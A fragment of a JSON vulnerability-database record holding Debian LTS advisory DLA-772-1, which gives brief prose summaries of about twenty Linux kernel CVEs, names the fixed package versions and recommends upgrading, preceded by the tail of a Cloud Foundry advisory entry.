"2016-12-27T00:00:00", "published": "2016-12-27T00:00:00", "id": "CFOUNDRY:17EB437F0AC67627647723802F6641F5", "href": "https://www.cloudfoundry.org/blog/usn-3146-2/", "title": "USN-3146-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-08-12T01:05:49", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7097", "CVE-2016-9794", "CVE-2016-7910", "CVE-2016-8633", "CVE-2016-8655", "CVE-2016-8399", "CVE-2016-9793", "CVE-2016-7911", "CVE-2016-10088", "CVE-2015-8962", "CVE-2015-8964", "CVE-2016-9555", "CVE-2016-9178", "CVE-2016-7915", "CVE-2015-8963", "CVE-2015-1350", "CVE-2012-6704", "CVE-2016-9576", "CVE-2016-9756", "CVE-2016-8645"], "description": "Package : linux\nVersion : 3.2.84-1\nCVE ID : CVE-2012-6704 CVE-2015-1350 CVE-2015-8962 CVE-2015-8963 \n CVE-2015-8964 CVE-2016-7097 CVE-2016-7910 CVE-2016-7911\n\t\t CVE-2016-7915 CVE-2016-8399 CVE-2016-8633 CVE-2016-8645\n\t\t CVE-2016-8655 CVE-2016-9178 CVE-2016-9555 CVE-2016-9576\n\t\t CVE-2016-9756 CVE-2016-9793 CVE-2016-9794 CVE-2016-10088\nDebian Bug : 770492\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2012-6704, CVE-2016-9793\n\n Eric Dumazet found that a local user with CAP_NET_ADMIN capability\n could set a socket's buffer size to be negative, leading to a\n denial of service or other security impact. Additionally, in\n kernel versions prior to 3.5, any user could do this if sysctl\n net.core.rmem_max was changed to a very large value.\n\nCVE-2015-1350 / #770492\n\n Ben Harris reported that local users could remove set-capability\n attributes from any file visible to them, allowing a denial of\n service.\n\nCVE-2015-8962\n\n Calvin Owens fouund that removing a SCSI device while it was being\n accessed through the SCSI generic (sg) driver led to a double-\n free, possibly causing a denial of service (crash or memory\n corruption) or privilege escalation. This could be exploited by\n local users with permision to access a SCSI device node.\n\nCVE-2015-8963\n\n Sasha Levin reported that hot-unplugging a CPU resulted in a\n use-after-free by the performance events (perf) subsystem,\n possibly causing a denial of service (crash or memory corruption)\n or privilege escalation. This could by exploited by any local\n user.\n\nCVE-2015-8964\n\n It was found that the terminal/serial (tty) subsystem did not\n reliably reset the terminal buffer state when the terminal line\n discipline was changed. This could allow a local user with access\n to a terminal device to read sensitive information from kernel\n memory.\n\nCVE-2016-7097\n\n Jan Kara found that changing the POSIX ACL of a file never cleared\n its set-group-ID flag, which should be done if the user changing\n it is not a member of the group-owner. In some cases, this would\n allow the user-owner of an executable to gain the privileges of\n the group-owner.\n\nCVE-2016-7910\n\n Vegard Nossum discovered that a memory allocation failure while\n handling a read of /proc/diskstats or /proc/partitions could lead\n to a use-after-free, possibly causing a denial of service (crash\n or memory corruption) or privilege escalation.\n\nCVE-2016-7911\n\n Dmitry Vyukov reported that a race between ioprio_get() and\n ioprio_set() system calls could result in a use-after-free,\n possibly causing a denial of service (crash) or leaking sensitive\n information.\n\nCVE-2016-7915\n\n Benjamin Tissoires found that HID devices could trigger an out-of-\n bounds memory access in the HID core. A physically present user\n could possibly use this for denial of service (crash) or to leak\n sensitive information.\n\nCVE-2016-8399\n\n Qidan He reported that the IPv4 ping socket implementation did\n not validate the length of packets to be sent. A user with\n permisson to use ping sockets could cause an out-of-bounds read,\n possibly resulting in a denial of service or information leak.\n However, on Debian systems no users have permission to create ping\n sockets by default.\n\nCVE-2016-8633\n\n Eyal Itkin reported that the IP-over-Firewire driver\n (firewire-net) did not validate the offset or length in link-layer\n fragmentation headers. This allowed a remote system connected by\n Firewire to write to memory after a packet buffer, leading to a\n denial of service (crash) or remote code execution.\n\nCVE-2016-8645\n\n Marco Grassi reported that if a socket filter (BPF program)\n attached to a TCP socket truncates or removes the TCP header, this\n could cause a denial of service (crash). This was exploitable by\n any local user.\n\nCVE-2016-8655\n\n Philip Pettersson found that the implementation of packet sockets\n (AF_PACKET family) had a race condition between enabling a\n transmit ring buffer and changing the version of buffers used,\n which could result in a use-after-free. A local user with the\n CAP_NET_ADMIN capability could exploit this for privilege\n escalation.\n\nCVE-2016-9178\n\n Al Viro found that a failure to read data from user memory might\n lead to a information leak on the x86 architecture (amd64 or i386).\n\nCVE-2016-9555\n\n Andrey Konovalov reported that the SCTP implementation does not\n validate 'out of the blue' packet chunk lengths early enough. A\n remote system able could use this to cause a denial of service\n (crash) or other security impact for systems using SCTP.\n\nCVE-2016-9576, CVE-2016-10088\n\n Dmitry Vyukov reported that using splice() with the SCSI generic\n driver led to kernel memory corruption. Local users with\n permision to access a SCSI device node could exploit this for\n privilege escalation.\n\nCVE-2016-9756\n\n Dmitry Vyukov reported that KVM for the x86 architecture (amd64 or\n i386) did not correctly handle the failure of certain instructions\n that require software emulation on older processors. This could\n be exploited by guest systems to leak sensitive information or for\n denial of service (log spam).\n\nCVE-2016-9794\n\n Baozeng Ding reported a race condition in the ALSA (sound)\n subsystem that could result in a use-after-free. Local users with\n access to a PCM sound device could exploit this for denial of\n service (crash or memory corruption) or other security impact.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n3.2.84-1. This version also includes bug fixes from upstream version\n3.2.84 and updates the PREEMPT_RT featureset to version 3.2.84-rt122.\nFinally, this version adds the option to mitigate security issues in\nthe performance events (perf) subsystem by disabling use by\nunprivileged users. This can be done by setting sysctl\nkernel.perf_event_paranoid=3.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n3.16.39-1 which will be included in the next point release (8.6).\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \nBen Hutchings - Debian developer, member of kernel, installer and LTS teams", "edition": 7, "modified": "2017-01-01T18:25:09", "published": "2017-01-01T18:25:09", "id": "DEBIAN:DLA-772-1:EB721", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201701/msg00001.html", "title": "[SECURITY] [DLA 772-1] linux security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
